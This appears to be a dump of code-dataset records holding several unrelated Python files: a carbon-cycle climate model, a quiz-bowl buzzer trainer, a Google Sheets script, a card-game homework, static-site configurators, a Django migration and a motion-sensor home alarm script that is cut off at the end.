of the atmosphere-ocean [Tmol eq kg-1]\r\n Ap - carbonate alkalinity of the pore space [Tmol eq kg-1]\r\n F_sil - continental silicate weathering flux [ Tmol C yr-1]\r\n F_diss - seafloor weathering from basalt dissolution [Tmol eq yr-1]\r\n P_pore - carbonate precipitation flux in the pore space [Tmol C yr-1]\r\n\r\n Returns:\r\n dCo_dt - change in atmosphere-ocean carbon concentration [Tmol C yr-1]\r\n dAo_dt - change in atmosphere-ocean alkalinity [Tmol eq yr-1]\r\n dCp_dt - change in pore space carbon concentration [Tmol C yr-1]\r\n dAp_dt - change in pore space alkalinity [Tmol eq yr-1]\r\n \"\"\"\r\n\r\n dCo_dt = (-J*(Co - Cp) + F_out + F_carb - P_ocean)/Mo\r\n dAo_dt = (-J*(Ao - Ap) + 2*(F_sil + F_carb - P_ocean))/Mo\r\n dCp_dt = (J*(Co - Cp) - P_pore)/Mp\r\n dAp_dt = (J*(Ao - Ap) +2*(F_diss - P_pore))/Mp\r\n\r\n return [dCo_dt, dAo_dt, 
dCp_dt, dAp_dt]\r\n\r\n\r\ndef deltaSurfaceTemperature(Ts, Tmod_s):\r\n \"\"\"\r\n Calculate the delta Ts term for equation 1 and S2.\r\n\r\n Inputs:\r\n Ts - the surface temperature [K]\r\n Tmod_s - the modern surface temperature of the Earth [K]\r\n\r\n Returns:\r\n deltaTs - the change in temperature [K]\r\n \"\"\"\r\n\r\n deltaTs = Ts - Tmod_s\r\n\r\n return deltaTs\r\n\r\n\r\ndef continentalCarbonateWeathering(f_bio, f_land, Fmod_carb, pCO2, pCO2mod,\r\n eps, deltaTs, Te):\r\n \"\"\"\r\n The rate of carbon liberated by continental weathering will be returned from \r\n this function. This is function S2 in JKT.\r\n\r\n Inputs:\r\n f_bio - biological enhancement of weathering, set to 1 for the \r\n modern Earth [dimensionless]\r\n f_land - land fraction compared to the modern Earth [dimensionless]\r\n Fmod_carb - Earth's modern carbonate weathering rate [Tmol yr-1]\r\n pCO2 - partial pressure of CO2 [Pa]\r\n pCO2mod - Earth's modern (preindustrial) CO2 partial pressure [Pa]\r\n eps - empirical constant [dimensionless]\r\n deltaTs - difference in global mean surface temperature [K]\r\n Te - defines temperature dependence of weathering [K]\r\n\r\n Returns:\r\n F_carb - the carbonate weathering rate [Tmol yr-1]\r\n \"\"\"\r\n\r\n F_carb = f_bio*f_land*Fmod_carb*(pCO2/pCO2mod)**eps*exp(deltaTs/Te)\r\n\r\n return F_carb\r\n\r\ndef continentalSilicateWeahtering(f_bio, f_land, Fmod_sil, pCO2, pCO2mod, \r\n alpha, deltaTs, Te):\r\n \"\"\"\r\n The rate of silicate weathering from continents. 
This function corresponds\r\n to equation 1 from JKT.\r\n\r\n Inputs:\r\n f_bio - biological enhancement of weathering, set to 1 for the \r\n modern Earth [dimensionless]\r\n f_land - land fraction compared to the modern Earth [dimensionless]\r\n Fmod_sil - Earth's modern silicate weathering rate [Tmol yr-1]\r\n pCO2 - partial pressure of CO2 [Pa]\r\n pCO2mod - Earth's modern (preindustrial) CO2 partial pressure [Pa]\r\n alpha - empirical constant [dimensionless]\r\n deltaTs - difference in global mean surface temperature [K]\r\n Te - defines temperature dependence of weathering [K]\r\n\r\n Returns:\r\n F_sil - the silicate weathering rate [Tmol yr-1]\r\n \"\"\"\r\n\r\n F_sil = f_bio*f_land*Fmod_sil*(pCO2/pCO2mod)**alpha*exp(deltaTs/Te)\r\n\r\n return F_sil\r\n\r\ndef seafloorBasaltDissolution(k_diss, r_sr, E_bas, T_pore, H_mol, Hmod_mol,\r\n gamma):\r\n \"\"\"\r\n This function will calculate the rate of basalt dissolution on the \r\n seafloor. This function represents equation S3 of JKT.\r\n\r\n Inputs:\r\n k_diss - proportionality constant chosen to match modern flux \r\n [dimensionless]\r\n r_sr - spreading rate compared to modern [dimensionless] \r\n E_bas - effective activation energy of dissolution [kJ mol-1]\r\n T_pore - temperature of the pore space [K]\r\n H_mol - hydrogen ion molality in the pore space [mol kg-1]\r\n Hmod_mol - the modern H ion molality in pre space [mol kg-1]\r\n gamma - empirical scaling parameter [dimensionless]\r\n\r\n Returns:\r\n F_diss - rate of seafloor basalt dissolution [Tmol eq yr-1]\r\n \"\"\"\r\n\r\n Rg = 8.314 #universal gas constant [J mol-1 K-1]\r\n #F_diss_ = k_diss*r_sr*exp(-E_bas/(Rg*T_pore))*(H_mol/Hmod_mol)**gamma\r\n #print(\"k_diss=%2.3e, r_sr=%2.3e\"%(k_diss,r_sr))\r\n F_diss = k_diss*r_sr*exp(-E_bas/(Rg*T_pore))*2.88*10**-14*\\\r\n 10**(-gamma*(-log10(H_mol)))\r\n\r\n return F_diss\r\n\r\ndef poreSpaceTemperature(T_D, Q, S_thick, K):\r\n \"\"\"\r\n This function will calculate the temperature of the pore space. 
This is \r\n based on equation S4.\r\n\r\n Inputs:\r\n T_D - deep ocean temperature [K]\r\n Q - pore space heat flow relative to modern Earth [dimensionless]\r\n S_thick - the thickness of the pore space [m]\r\n K - conductivity of the pore space sediments [m K-1]\r\n\r\n Returns:\r\n T_pore - the temperature of the pore space [K]\r\n \"\"\"\r\n\r\n T_pore = T_D + Q*S_thick/K\r\n\r\n return T_pore\r\n\r\ndef globalOutgassing(Fmod_out, Q, m):\r\n \"\"\"\r\n This function will calculate the outgassing flux (equation S9).\r\n\r\n Inputs:\r\n Fmod_out - the modern Earth's outgassing rate [Tmol C yr-1]\r\n Q - pore space heat flow relative to modern Earth [dimensionless]\r\n m - scaling parameter [dimensionless]\r\n\r\n Returns:\r\n F_out - the global outgassing flux [Tmol C yr-1]\r\n \"\"\"\r\n\r\n F_out = Fmod_out*Q**m\r\n \r\n return F_out\r\n\r\ndef spreadingRate(Q, beta):\r\n \"\"\"\r\n Calculates the spreading rate on the planet.\r\n\r\n Inputs:\r\n Q - pore space heat flow relative to modern Earth [dimensionless]\r\n beta - scaling parameter [dimensionless]\r\n\r\n Returns:\r\n r_sr - the spreading rate relative to the modern Earth [dimensionless]\r\n \"\"\"\r\n\r\n r_sr = Q**beta\r\n\r\n return r_sr\r\n\r\ndef equilibriumChemistry(T, alk, carb, s, alk_init, Ca_init):\r\n \"\"\"\r\n Calculate the carbonate equilibrium and alkalinity. This can be used for\r\n either the atmosphere-ocean or the pore space. 
This function represents \r\n equations S11-S18.\r\n\r\n Inputs:\r\n T - the temperature of the system [K]\r\n alk - the alkalinity of the system [Tmol eq]\r\n carb - the carbon abundance in the system [Tmol]\r\n s - correction factor for mass balance\r\n alk_init - initial alkalinity of the system [Tmol eq]\r\n Ca_init - initial calcium ion concentration in the system [Tmol]\r\n\r\n Returns:\r\n omega - the saturation state of the system\r\n pCO2 - the partial pressure of CO2 [bar]\r\n pH - pH of the system\r\n \"\"\"\r\n\r\n #get the rate constants and Henry's constant\r\n [K1, K2, H_CO2] = equilibriumRateConstants(T)\r\n \r\n #use equation S15 to first calculate the H+ ion concentration\r\n roots = np.roots([alk/(K1*K2)*(1.0+s/H_CO2),\r\n (alk-carb)/K2,\r\n alk-2.0*carb])\r\n\r\n H_ion = np.max(roots) #just take the positive root\r\n pH = -log10(H_ion) #equation S16 (aka pH definition)\r\n\r\n CO3 = alk/(2.0+H_ion/K2) #S14 with S11\r\n HCO3 = alk - 2.0*CO3 #S11\r\n CO2_aq = H_ion*HCO3/K1 #S13\r\n pCO2 = CO2_aq/H_CO2 #S12\r\n Ca_ion = 0.5*(alk - alk_init) + Ca_init #S17\r\n\r\n K_sp = carbonateSolubility(T)\r\n omega = Ca_ion*CO3/K_sp # S18\r\n\r\n\r\n return [omega, pCO2, pH]\r\n\r\n\r\ndef carbonateSolubility(T):\r\n \"\"\"\r\n Calculates carbonate solubility rate constant as a function of temperature.\r\n See Appendix A of JKT 2018 for further details (you'll need to look at\r\n their 2017 paper for these actual equations - but Appendix A tells you \r\n that).\r\n\r\n Inputs:\r\n T - the temperature of the system [K]\r\n\r\n Returns:\r\n result - the solubility rate constant\r\n \"\"\"\r\n bo = -0.77712\r\n b1 = 0.0028426\r\n b2 = 178.34\r\n co = -0.07711\r\n do = 0.0041249\r\n S = 35.0\r\n logK0=-171.9065-0.077993*T+2839.319/T+71.595*log10(T) \r\n logK=logK0+(bo+b1*T+b2/T)*S**0.5+co*S+do*S**1.5\r\n\r\n result = 10.0**logK\r\n\r\n return result\r\n\r\n\r\ndef equilibriumRateConstants(T):\r\n \"\"\"\r\n Calculates the carbon chemistry equilibrium constants as a 
function of \r\n temperature following the method in Appendix A of JKT 2018 (you actually\r\n have to look at their 2017 paper for these equations).\r\n\r\n Inputs:\r\n T - the temperature of the system [K]\r\n\r\n Returns:\r\n K1 - the first apparent dissociation rate constant of carbonic acid\r\n K2 - the second apparent dissociation rate constant of carbonic acid\r\n H_CO2 - Henry's law constant for CO2\r\n \"\"\"\r\n\r\n pK1=17.788 - .073104 *T - .0051087*35 + 1.1463*10**-4*T**2\r\n pK2=20.919 - .064209 *T - .011887*35 + 8.7313*10**-5*T**2\r\n H_CO2=exp(9345.17/T - 167.8108 + 23.3585 * log(T) + \r\n (.023517 - 2.3656*10**-4*T+4.7036*10**-7*T**2)*35)\r\n \r\n K1 = 10.0**-pK1\r\n K2 = 10.0**-pK2\r\n\r\n return [K1,K2,H_CO2]\r\n\r\n\r\ndef deepOceanTemperature(Ts, gradient, min_temp=271.15):\r\n \"\"\"\r\n Determine the deep ocean temperature based on the surface temperature. The\r\n intercept term is chosen so that gradient*Ts+intercept gives the correct\r\n surface temperature. In the case of the modern Earth, that would be the\r\n modern average surface temperature. This function corresponds to equation\r\n S20.\r\n\r\n Inputs:\r\n Ts - surface temperature [K]\r\n gradient - total temperature gradient in the ocean [dimensionless]\r\n min_temp - the minimum allowable temperature at the bottom of the \r\n ocean. For an Earth-like planet below 271.15 K (the default\r\n value) the ocean would freeze.\r\n\r\n Returns:\r\n Td - the temperature at the bottom of the ocean [K]\r\n \"\"\"\r\n\r\n # intercept chosen to reproduce initial (modern) temperature\r\n intercept = 274.037 - gradient*Ts \r\n Td = np.max([np.min([gradient*Ts+intercept, Ts]), min_temp])\r\n\r\n return Td\r\n\r\n\r\n# This function is the CO2-only climate model\r\ndef surfaceTempFromPureCO2ClimateModel(pCO2, flux):\r\n \"\"\"\r\n This function will return the surface temperature of a Earth-like planet for\r\n the given partial pressure of pCO2 and incident flux (normalized to modern\r\n Earth's). 
The function is defined for CO2 levels between >1.0E-7 and <0.8 \r\n bar. The flux definitions are from 1.05 to 0.31 (the HZ for a Sun-like\r\n star). The fit is to a 4th order polynomial over CO2 and flux.\r\n\r\n Inputs:\r\n pCO2 - the CO2 partial pressure of the atmosphere [bar]\r\n flux - the incident flux normalised to the modern Earths (i.e. divided\r\n by ~1360 [W m-2])\r\n\r\n Returns:\r\n the surface temperature of the planet [K]\r\n \"\"\"\r\n #the fit was done in log space for CO2\r\n x = np.log(pCO2)\r\n y = flux\r\n\r\n coeffs = np.array([4.8092693271e+00, -2.2201836059e+02, -6.8437057004e+01, \r\n -6.7369814833e+00, -2.0576569974e-01, 1.4144615786e+03, \r\n 4.4638645525e+02, 4.4412679359e+01, 1.3641352778e+00, -2.9643244170e+03, \r\n -9.7844390774e+02, -9.8858815404e+01, -3.0586461777e+00, \r\n 2.6547903068e+03, 9.0749599550e+02, 9.2870700889e+01, 2.8915352308e+00, \r\n -8.6843290311e+02, -3.0464088878e+02, -3.1476199768e+01, \r\n -9.8478712084e-01, 1.0454688611e+03, -1.4964888001e+03, \r\n 1.0637917601e+03, -2.8114373919e+02])\r\n\r\n p4_in = np.array([1, x, x**2, x**3, x**4, x*y, x**2*y, x**3*y, x**4*y, \r\n x*y**2, x**2*y**2, x**3*y**2, x**4*y**2, x*y**3, x**2*y**3, x**3*y**3, \r\n x**4*y**3, x*y**4, x**2*y**4, x**3*y**4, x**4*y**4, y, y**2, y**3, \r\n y**4])\r\n\r\n return np.sum(p4_in*coeffs)\r\n\r\n\r\ninpts = ModelInputs()\r\nlums = np.linspace(1, 0.6, 10)\r\ninpts.f_bio = 1\r\nCO2s = []\r\nfor lum in lums:\r\n inpts.lum = lum\r\n [pCO2, pH, Ts], times, y_vals, status = runWeatheringModelPore(inputs=inpts,\r\n guess=None, chem_tol=1.0E-5, chem_max_iter=10, timestep=1000.0)\r\n CO2s.append(pCO2)\r\n\r\nprint(\"CO2s:\")\r\nprint(CO2s)\r\nprint(\"-----------\")\r\nprint(\"Lums:\")\r\nprint(lums)\r\n\r\n#print(\"Input flux: 
%0.2f\"%(inpts.lum))\r\n#print(\"pH=%2.3e\"%(pH))\r\n#print(\"pCO2=%2.3e\"%(pCO2))\r\n#print(\"Ts=%2.3e\"%(Ts))\r\n","sub_path":"model_functions.py","file_name":"model_functions.py","file_ext":"py","file_size_in_byte":26837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"653923062","text":"import os\nimport pickle\nimport numpy as np\nimport argparse\nfrom collections import defaultdict, namedtuple\n\nimport chainer\nimport chainer.functions as F\nimport chainer.links as L\nfrom chainer import Variable\nfrom chainer import cuda\n\nfrom qanta.guesser.abstract import AbstractGuesser\nfrom qanta.util import constants as c\nfrom qanta.buzzer.util import GUESSERS\nfrom qanta import qlogging\n\nfrom qanta.buzzer.progress import ProgressBar\n\nN_GUESSERS = len(GUESSERS)\nlog = qlogging.get(__name__)\n\nclass Trainer(object):\n\n def __init__(self, model, model_dir=None):\n self.model = model\n self.model_dir = model_dir\n self.optimizer = chainer.optimizers.Adam()\n self.optimizer.setup(self.model)\n self.optimizer.add_hook(chainer.optimizer.GradientClipping(5))\n\n def backprop(self, loss):\n self.optimizer.target.cleargrads()\n self.optimizer.update(lossfun=lambda: loss)\n\n def loss(self, ys, ts, mask):\n # ys: [length * batch_size, n_guessers]\n # ts: [length * batch_size, n_guessers]\n # mask: [length * batch_size]\n xp = self.model.xp\n ts = xp.asarray(ts.data, dtype=xp.float32)\n ys = F.log_softmax(ys) # length * batch_size, n_guessers\n loss = -F.sum(F.sum(ys * ts, axis=1) * mask.data) / mask.data.sum()\n return loss\n\n def metric(self, ys, ts, mask):\n # shapes are length * batch_size * n_guessers\n if ys.shape != ts.shape:\n raise ValueError(\"Shape of prediction {0} does not match with ground \\\n truth {1}.\".format( ys.shape, ts.shape))\n if ys.shape[0] != mask.shape[0]:\n raise ValueError(\"Shape0 of prediction {0} does not match with \\\n mask0 {1}.\".format(ys.shape[0], mask.shape[0]))\n stats = 
dict()\n ys = F.argmax(ys, axis=1)\n ts = self.model.xp.asarray(ts, dtype=self.model.xp.float32)\n correct = F.sum((F.select_item(ts, ys) * mask)).data\n total = mask.sum()\n stats['acc'] = (correct / total).tolist()\n return stats\n\n def test(self, test_iter):\n buzzes = dict()\n # progress_bar = ProgressBar(test_iter.size, unit_iteration=True)\n for i in range(test_iter.size):\n batch = test_iter.next_batch(self.model.xp)\n length, batch_size, _ = batch.vecs.shape\n ys = self.model(batch.vecs, train=False)\n ys = F.softmax(ys) # length * batch_size, n_guessers+1\n ys = F.swapaxes(F.reshape(ys, (length, batch_size, -1)), 0, 1)\n ys.to_cpu()\n masks = batch.mask.T.tolist()\n assert len(masks) == batch_size\n for qnum, scores, mask in zip(batch.qids, ys.data, masks):\n if isinstance(qnum, np.ndarray):\n qnum = qnum.tolist()\n total = int(sum(mask))\n buzzes[qnum] = scores[:total].tolist()\n\n # for t in range(total):\n # q = buzzes[qnum][t][0]\n # if q < 0.6 and q > 0.5:\n # buzzes[qnum][t][0] -= 0.1\n # buzzes[qnum][t][1] += 0.1\n \n # progress_bar(*test_iter.epoch_detail)\n test_iter.finalize(reset=True)\n # progress_bar.finalize()\n return buzzes\n\n def evaluate(self, eval_iter):\n stats = defaultdict(lambda: 0)\n # progress_bar = ProgressBar(eval_iter.size, unit_iteration=True)\n for i in range(eval_iter.size):\n batch = eval_iter.next_batch(self.model.xp)\n length, batch_size, _ = batch.vecs.shape\n ys = self.model(batch.vecs, train=False)\n ts = F.reshape(batch.results, (length * batch_size, -1))\n mask = F.reshape(batch.mask, (length * batch_size, ))\n stats['loss'] = self.loss(ys, ts, mask).data.tolist()\n batch_stats = self.metric(ys.data, ts.data, mask.data)\n for k, v in batch_stats.items():\n stats[k] += v\n\n # progress_bar(*eval_iter.epoch_detail)\n eval_iter.finalize(reset=True)\n # progress_bar.finalize()\n\n for k, v in stats.items():\n stats[k] = v / eval_iter.size\n return stats\n\n def train_one_epoch(self, train_iter, progress_bar=None):\n 
stats = defaultdict(lambda: 0)\n for i in range(train_iter.size):\n batch = train_iter.next_batch(self.model.xp)\n length, batch_size, _ = batch.vecs.shape\n ys = self.model(batch.vecs, train=True)\n ts = F.reshape(batch.results, (length * batch_size, -1))\n mask = F.reshape(batch.mask, (length * batch_size, ))\n loss = self.loss(ys, ts, mask)\n self.backprop(loss)\n stats['loss'] = loss.data.tolist()\n batch_stats = self.metric(ys.data, ts.data, mask.data)\n for k, v in batch_stats.items():\n stats[k] += v\n\n if progress_bar is not None:\n progress_bar(*train_iter.epoch_detail)\n train_iter.finalize()\n if progress_bar is not None:\n progress_bar.finalize()\n\n for k, v in stats.items():\n stats[k] = v / train_iter.size\n return stats\n\n def run(self, train_iter=None, eval_iter=None, n_epochs=1, verbose=True):\n # progress_bar = ProgressBar(n_epochs, unit_iteration=False)\n progress_bar = None\n for epoch in range(n_epochs):\n if verbose:\n log.info('epoch {0}'.format(epoch))\n if train_iter is not None:\n train_stats = self.train_one_epoch(train_iter, progress_bar)\n if verbose:\n output = 'train '\n for k, v in train_stats.items():\n output += '{0}: {1:.2f} '.format(k, v)\n log.info(output)\n if eval_iter is not None:\n eval_stats = self.evaluate(eval_iter)\n if verbose:\n output = 'eval '\n for k, v in eval_stats.items():\n output += '{0}: {1:.2f} '.format(k, v)\n log.info(output)\n if self.model_dir is not None:\n chainer.serializers.save_npz(self.model_dir, self.model)\n train_iter.finalize(reset=True)\n","sub_path":"qanta/buzzer/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":6321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"89104197","text":"from googleapiclient.discovery import build\nfrom google.oauth2 import service_account\n\nSCOPES = ['https://www.googleapis.com/auth/spreadsheets']\nSERVICE_ACCOUNT_FILE = 'keys.json'\n\ncreds = None\ncreds = 
service_account.Credentials.from_service_account_file(\n SERVICE_ACCOUNT_FILE, scopes=SCOPES)\n\n# The ID and range of a sample spreadsheet.\nSAMPLE_SPREADSHEET_ID = '1bNSfi_e7Q9Ii7M6RUnulx9ta0hvv4oNBqgXTeHO_NSI'\n# SAMPLE_RANGE_NAME = 'Class Data!A2:E'\n\nservice = build('sheets', 'v4', credentials=creds)\n\n# Call the Sheets API\nsheet = service.spreadsheets()\nresult = sheet.values().get(spreadsheetId=SAMPLE_SPREADSHEET_ID,\n range=\"automated!B2:L31\").execute()\nvalues = result.get('values', [])\n\naoa = [[\"this_is\",2000],[\"an_automated\",4000],[\"update_test\",6000],[\"into_gsheet\",10000]]\n\nrequest = sheet.values().update(spreadsheetId=SAMPLE_SPREADSHEET_ID,\n range=\"writing_automated!B2\", valueInputOption=\"USER_ENTERED\", body={\"values\":aoa}).execute()\n\nprint(values)\n# if not values:\n# print('No data found.')\n# else:\n# print('Name, Major:')\n# for row in values:\n# # Print columns A and E, which correspond to indices 0 and 4.\n# print('%s, %s' % (row[0], row[4]))\n","sub_path":"python/gsheet_functions.py","file_name":"gsheet_functions.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"562183413","text":"\nfrom abc import ABCMeta, abstractmethod\nimport sys\nimport random\n\n#listofCards\n#method that deals a card from the list randomly without replacement like hw2\n\n#a constructor that sets up the list of rand\n# omly shuffled cards\n#make a new deck using constructor when cards run out\nclass Deck(object):\n listOfCards = {}\n deckArray=[]\n listRandomArray = []\n\n def __init__(self):\n print(\"ionside constructor\")\n # self.initializeKeyArray()\n self.createDeck()\n self.shuffle()\n # self.printDeck()\n self.amountOfCardsCheck()\n\n # self.initializeKeyArray()\n def amountOfCardsCheck(self):\n print(len(self.deckArray))\n if len(self.deckArray) <= 8:\n print(\"if len(self.deckArray)<= 3:\")\n self.initializeKeyArray()\n # 
self.shuffle()\n\n def createDeck(self):\n for i in range(66):\n if(i <= 22):\n self.listOfCards[i] = str(i % 22) + \" Rock\"\n\n if (i > 22 and i <= 44):\n self.listOfCards[i] = str(i % 22) + \" Paper\"\n\n if (i >= 44 and i <= 66):\n self.listOfCards[i] =str(i % 22) + \" Scissors\"\n\n def initializeKeyArray(self):\n print(\"initialize Array\")\n self.deckArray = list(range(66))\n print(self.deckArray)\n print(len(self.deckArray))\n\n def printDeck(self):\n # for i in range(66):\n # print(str(i) + \" \" + str(self.deckArray[i]))\n # print(\"printDeck\")\n for i in self.listOfCards:\n print(str(self.listOfCards[self.deckArray[i]]))\n # for i in self.deckArray:\n # print(self.deckArray[i])\n\n\n # deckArray=[]\n # listRandomArray = []\n def shuffle(self):\n self.deckArray = list(self.listOfCards)\n random.shuffle(self.deckArray)\n self.deckArray[:66]\n self.printDeck()\n\n\n\n# // abstaract class that has an integer value\n# // has a constructor that takes in an int value\nclass Card(object):\n ___metaclass__ = ABCMeta\n @abstractmethod\n def __init__(self, intValue):\n print(intValue)\n\nclass RockCard:\n print(' Rock Card')\n #integer value 0\n # appropriate String representatrion for the suit\n # inherit from Card\n #instance method takes a card as an argument returns boolean\n # (cont) reflects wheter this card beats the other card\n\nclass PaperCard:\n print('papercard')\n #integer value 1\n # appropriate String representatrion for the suit\n # inherit from Card\n #instance method takes a card as an argument returns boolean\n # (cont) reflects wheter this card beats the other card\nclass ScissorsCard:\n print('Scissors Card')\n # integer value 2\n # appropriate String representatrion for the suit\n # inherit from Card\n #instance method takes a card as an argument returns boolean\n # (cont) reflects wheter this card beats the other card\n\nclass Test(RockCard, PaperCard, ScissorsCard):\n def __init__(self):\n super(Test, self).__init__()\n\n\nclass 
SetGameStatus:\n exit = False\n\n\n#create random array and point to the deck\n#create user account\n\n#create specific class systmes and user dicitonary\n#\n# fullDeckOfCards = {}\n#\n# def createDeck():\n# for i in range(66):\n# if(i <= 22):\n# SetGameStatus.fullDeckOfCards[i] = str(i % 22) + \" Rock\"\n#\n# if (i > 22 and i <= 44):\n# SetGameStatus.fullDeckOfCards[i] = str(i % 22) + \" Paper\"\n#\n# if (i >= 44 and i <= 66):\n# SetGameStatus.fullDeckOfCards[i] =str(i % 22) + \" Scissors\"\n#\n\n\n\ndeck=Deck()\n\n\n\nprint(\"size of deckArray\" + str(len(deck.deckArray)))\n\n\n\n\n\nwhile(not SetGameStatus.exit ):\n print(\"test \" + str(SetGameStatus.exit))\n\n\n SetGameStatus.exit = True\n\n\n","sub_path":"Python/Fall_2016/Homework/hw_3_preVersion_I.py","file_name":"hw_3_preVersion_I.py","file_ext":"py","file_size_in_byte":3760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"46736151","text":"\"\"\"\nConfigurators are functions that are used to customize the data building process.\n\"\"\"\nimport os\nimport re\nimport yaml\n\nfrom whitenoise.tree import Directory, Node\n\n\nclass Configurator(object):\n def __call__(self, thing):\n try:\n if isinstance(thing, Directory):\n self.configurate_dir(thing)\n elif isinstance(thing, Node):\n self.configurate_file(thing)\n except NotImplementedError:\n pass\n\n def configurate_dir(self, directory):\n raise NotImplemented\n\n def configurate_file(self, node):\n raise NotImplemented\n\n\nfront_matter_re = re.compile('^---\\\\s*\\\\n([\\\\s\\\\S]*?\\\\n?)^---\\\\s*$\\\\n?', re.M)\n\n\ndef parse_front_matter(content):\n \"\"\"\n Returns a tuple of content and extracted data.\n \"\"\"\n match = front_matter_re.search(content)\n\n if match:\n content = content[match.end(0):].strip()\n data = yaml.load(match.group(1))\n else:\n data = {}\n\n return (content, data)\n\n\ndef front_matter_configurator(node):\n with open(node.path, 'r') as f:\n node.content, data = 
parse_front_matter(f.read())\n node.data.update(data)\n\n\nclass URLConfigurator(Configurator):\n def __init__(self, pattern, root_url=None):\n self.pattern = pattern\n self.root_url = root_url or '/'\n\n def configurate_dir(self, directory):\n path = directory.name\n if directory.parent:\n path = directory.parent.data['url'] + path\n directory.data['url'] = path + '/'\n target = os.path.join(directory.parent.data['target'], path)\n directory.data['target'] = directory.data['url']\n else:\n directory.data['url'] = self.root_url\n directory.data['target'] = ''\n\n def configurate_file(self, node):\n sub_part = self.pattern.format(**node.data)\n\n if node.is_index():\n node.data['url'] = node.parent.data['url']\n else:\n node.data['url'] = node.parent.data['url'] + sub_part\n\n node.data['target'] = os.path.join(node.parent.data['target'], sub_part)\n","sub_path":"whitenoise/configurators.py","file_name":"configurators.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"597733336","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('mytest', '0002_auto_20151122_0932'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='message',\n name='session_key',\n field=models.CharField(default=b'', max_length=32),\n ),\n ]\n","sub_path":"mytest/migrations/0003_message_session_key.py","file_name":"0003_message_session_key.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"392949899","text":"#!/usr/bin/env python3\n\nimport os.path\nfrom smtplib import SMTP_SSL\nfrom email.mime.text import MIMEText\nfrom time import time, localtime, strftime\nimport serial\nimport psutil\nimport subprocess\nimport threading\nimport config\n\n\ndef main():\n 
init()\n connect_to_arduino()\n while True:\n wait_for_movement()\n movement_detected()\n\ndef error(msg, notify=True):\n print(\"ERROR: %s\" % msg)\n\n if notify:\n email_subject = \"URGENT: Alarm error!\"\n email_text = \"The following error occured at %s: %s\" % (get_time(), msg)\n\n msg = MIMEText(email_text, 'plain')\n msg['From'] = config.email_sender\n msg['Subject'] = email_subject\n send_email(msg)\n\n exit(1)\n\ndef init():\n # check if arduino device exists\n if os.path.exists(config.dev_arduino) == False:\n error(\"Arduino device '%s' does not exist.\" % config.dev_arduino)\n\n # check if alarm armed state file exists\n if os.path.isfile(config.file_armed) == False:\n error(\"Alarm armed state file could not be found.\")\n\n # check if alarm log file exists\n if os.path.isfile(config.file_log) == False:\n error(\"Alarm log file could not be found.\")\n\n # check if video dir exists\n if os.path.isdir(config.dir_videos) == False:\n error(\"Video directory does not exist.\")\n\n global t_last_alarm_notification\n t_last_alarm_notification = 0\n\ndef connect_to_arduino():\n global ser\n try:\n ser = serial.Serial(port=config.dev_arduino, baudrate=9600)\n except:\n error(\"Could not open arduino device '%s'.\" % config.dev_arduino)\n\ndef wait_for_movement():\n try:\n ser.read()\n except serial.SerialException:\n error(\"Reading from arduino device failed.\")\n\n\ndef movement_detected():\n global t_last_alarm_notification\n\n armed = is_armed()\n recording = armed and is_cam_connected() and (is_cam_recording() == False)\n notification = armed and (int(time()) - t_last_alarm_notification) > config.t_notification_backoff\n\n if recording:\n start_recording()\n\n if notification:\n notify_alarm(recording)\n t_last_alarm_notification = int(time())\n\n log_movement(armed, recording=recording, notification=notification)\n\ndef get_time():\n return strftime(\"%Y/%m/%d - %H:%M:%S\", localtime())\n\ndef log(msg):\n try:\n with open(config.file_log, 'a') as f:\n 
f.write(\"%s\\n\" % msg)\n except:\n error(\"Alarm log file could not be written.\")\n\ndef is_armed():\n try:\n with open(config.file_armed, 'r') as f:\n return f.read(1) == '1'\n except:\n error(\"Alarm armed state file could not be read.\")\n\ndef is_cam_recording():\n for proc in psutil.process_iter():\n if proc.name() == \"vlc\":\n return True\n return False\n\ndef is_cam_connected():\n return os.path.exists(config.dev_camara)\n\ndef send_email(msg):\n try:\n conn = SMTP_SSL(config.smtp_server_host, config.smtp_server_port)\n conn.login(config.smtp_server_username, config.smtp_server_password)\n try:\n conn.sendmail(config.email_sender, config.email_dest, msg.as_string())\n finally:\n conn.close()\n except Exception:\n error(\"Failed to send email alarm notification\", False)\n\ndef notify_alarm(recording):\n email_subject = \"URGENT: Alarm went off!\"\n email_text = \"An alarm went off at %s. \" % get_time()\n\n if recording:\n email_text += \"Webcam recording was startet.\"\n else:\n email_text += \"Webcam recording was not startet.\"\n\n msg = MIMEText(email_text, 'plain')\n msg['From'] = config.email_sender\n msg['Subject'] = email_subject\n\n send_email(msg)\n\ndef log_movement(armed, recording, notification):\n if armed:\n msg_armed = \"Alarm armed\"\n else:\n msg_armed = \"Alarm not armed\"\n\n if recording:\n msg_recording = \"recording started\"\n else:\n msg_recording = \"recording not started\"\n\n if notification:\n msg_notification = \"notification sent\"\n else:\n msg_notification = \"no notification sent\"\n\n msg = \"%s: Movement (%s, %s, %s)\" % (get_time(), msg_armed, msg_recording, msg_notification)\n log(msg)\n\ndef start_recording():\n t = RecordingThread()\n t.start()\n\nclass RecordingThread(threading.Thread):\n\n def __init__(self):\n threading.Thread.__init__(self)\n\n def run(self):\n time = strftime(\"%y%m%d-%H%M%S\", localtime())\n\n filename = \"%s/alarm_%s.avi\" % (config.dir_videos, time)\n\n DEVNULL = open(os.devnull, 'w')\n 
